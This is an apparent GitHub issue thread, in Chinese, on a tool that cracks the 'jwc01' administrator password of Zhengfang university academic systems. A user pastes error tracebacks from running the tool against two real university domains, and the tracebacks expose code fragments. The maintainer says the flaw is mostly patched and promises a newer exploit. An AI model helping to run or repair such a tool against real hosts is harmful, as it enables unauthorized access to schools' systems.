### ISSUE TITLE
python新手，请问咋用啊，改zhengfang.py哪里的代码啊？

### ISSUE THREAD

**Issue by ghost** [xiaohuanshu/zhengfang-jwc01-password#1]
。。。。。。

**Comment by ghost** [comment]
@xiaohuanshu  
错误代码如下
D:\>python zhengfang.py jiaowu.xianyangzhiyuan.cn
Password:
Traceback (most recent call last):
  File "zhengfang.py", line 60, in <module>
    print "Password:", crack_zhengfang( pwdhash=SendRtx(getIp(sys.argv[1]),"jwc0
1"), key="Encrypt01" )
  File "zhengfang.py", line 28, in SendRtx
    return re.findall(u"(?<=\<xh xsi\:type=\"xsd:string\"\>).*?(?=\</xh\>)",webs
ervice.getfile().read(),re.DOTALL)[0]
IndexError: list index out of range

D:\>python zhengfang.py xk.suda.edu.cn
Password:
Traceback (most recent call last):
  File "zhengfang.py", line 60, in <module>
    print "Password:", crack_zhengfang( pwdhash=SendRtx(getIp(sys.argv[1]),"jwc0
1"), key="Encrypt01" )
  File "zhengfang.py", line 28, in SendRtx
    return re.findall(u"(?<=\<xh xsi\:type=\"xsd:string\"\>).*?(?=\</xh\>)",webs
ervice.getfile().read(),re.DOTALL)[0]
IndexError: list index out of range

**Comment by ghost** [comment]
D:\>python zhengfang.py http://jiaowu.xianyangzhiyuan.cn
Password:
Traceback (most recent call last):
  File "zhengfang.py", line 60, in <module>
    print "Password:", crack_zhengfang( pwdhash=SendRtx(getIp(sys.argv[1]),"jwc0
1"), key="Encrypt01" )
  File "zhengfang.py", line 51, in getIp
    myaddr = socket.getaddrinfo(domain,'http')[0][4][0]
socket.gaierror: [Errno 11004] getaddrinfo failed

D:\>

**Comment by xiaohuanshu** [comment]
报错说明学校的漏洞已经修补了，这个漏洞已经一年多了，大部分学校都已经用不了了。不过还有一个漏洞比这个新点，改天我更新一下吧
